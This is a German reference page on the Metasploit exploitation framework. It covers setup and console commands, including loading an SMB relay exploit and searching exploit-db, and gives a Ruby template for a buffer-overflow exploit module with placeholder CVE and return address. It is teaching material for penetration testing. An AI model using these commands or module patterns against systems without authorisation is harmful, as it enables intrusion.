
Metasploit ist ein Framework für das automatisierte Ausführen von Exploits mit Scriptingfunktionen in Ruby. Siehe auch msfvenom.

Usage

service postgresql start
msfdb init
msfconsole [| armitage]
use exploit/windows/smb/smb_relay
show options|info

# show running sessions
sessions
# Show running jobs
jobs
# update from git
exploitdb -u
# source directory
ls /usr/share/exploitdb
searchsploit oracle windows remote

Tips

# set rhosts globally
setg rhosts 192.168.0.1

Ein Modul schreiben

#MySampleModule
 
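class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # Fully qualified so the include does not depend on how the loader resolves
  # the bare `Exploit` constant.
  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata and its datastore options.
  #
  # @param info [Hash] extra metadata merged into the defaults by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'My sample Exploit',
      'Description'    => %q{
          This file illustrates how to write a module.
      },
      'License'        => 'UnLicense',
      'Author'         => ['mbrain'],
      'References'     =>
        [
          # Placeholder identifier for the template; a real module cites the
          # actual advisory.
          [ 'CVE', '1234-5678'],
        ],
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          [
            'Windows XP/Vista/7/8',
            {
              'Platform' => 'win',
              'Ret'      => 0x41424344 # placeholder value, consumed by #exploit
            }
          ],
        ],
      'DisclosureDate' => "Apr 1 2013",
      'DefaultTarget'  => 0))

    # The original declared RPORT twice (80 in 'DefaultOptions', 4444 here) and
    # pinned a fixed RHOSTS in 'DefaultOptions'. 'DefaultOptions' overrides the
    # registered option default, so 80 was the effective port; it is kept as
    # the single declaration. A module must not ship a hard-coded target
    # address, so the RHOSTS default is dropped and left to the operator.
    register_options([
      Opt::RPORT(80) # example option for the remote port
    ])
  end

  # Usually probes the target and returns a CheckCode describing the result.
  # The template performs no probe, so it reports Unknown instead of claiming
  # Vulnerable unconditionally, which would mislead anyone relying on `check`.
  def check
    Msf::Exploit::CheckCode::Unknown
  end

  # Placeholder kept from the template. Exploit modules are driven through
  # #exploit; `run` is the entry point of auxiliary and post modules, so this
  # body is intentionally empty (the original `...` did not parse).
  def run
    # nothing to do for an exploit module
  end

  # Connects, sends the padded buffer followed by the payload, and hands control
  # to the payload handler. The socket is released in ensure so that a failed
  # put/get does not leak the connection.
  def exploit
    connect
    print_status("Sending #{payload.encoded.length} byte payload...")
    buf  = rand_text_alpha(1024)
    buf << [ target.ret ].pack('V') # target 'Ret' as a little-endian 32-bit value
    buf << payload.encoded
    sock.put(buf)
    sock.get_once
    handler
  ensure
    disconnect # Tcp mixin's disconnect tolerates a nil socket
  end

end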